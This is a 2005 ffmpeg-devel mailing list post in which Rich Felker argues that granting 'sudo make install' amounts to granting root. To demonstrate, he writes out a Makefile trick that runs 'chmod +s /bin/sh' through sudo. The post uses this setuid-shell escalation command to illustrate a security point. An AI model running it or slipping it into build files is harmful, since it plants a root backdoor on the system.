[Ffmpeg-devel] PATCH: Build Suffix

Rich Felker dalias
Thu Jul 28 20:52:24 CEST 2005


On Thu, Jul 28, 2005 at 06:45:59PM +0200, Diego Biurrun wrote:
> On Thu, Jul 28, 2005 at 10:01:29AM -0600, Mike Melanson wrote:
> > M?ns Rullg?rd wrote:
> > >Charles Yates said:
> > >
> > >>On Thu, 2005-07-28 at 10:44 -0400, Rich Felker wrote:
> > >>
> > >>>sudo is idiotic anyway. If you allow someone to sudo make install,
> > >>>they can have full root perms in a few seconds.
> 
> example?

cat << EOF > Makefile
install:
	chmod +s /bin/sh
EOF
sudo make install

Rich





More information about the ffmpeg-devel mailing list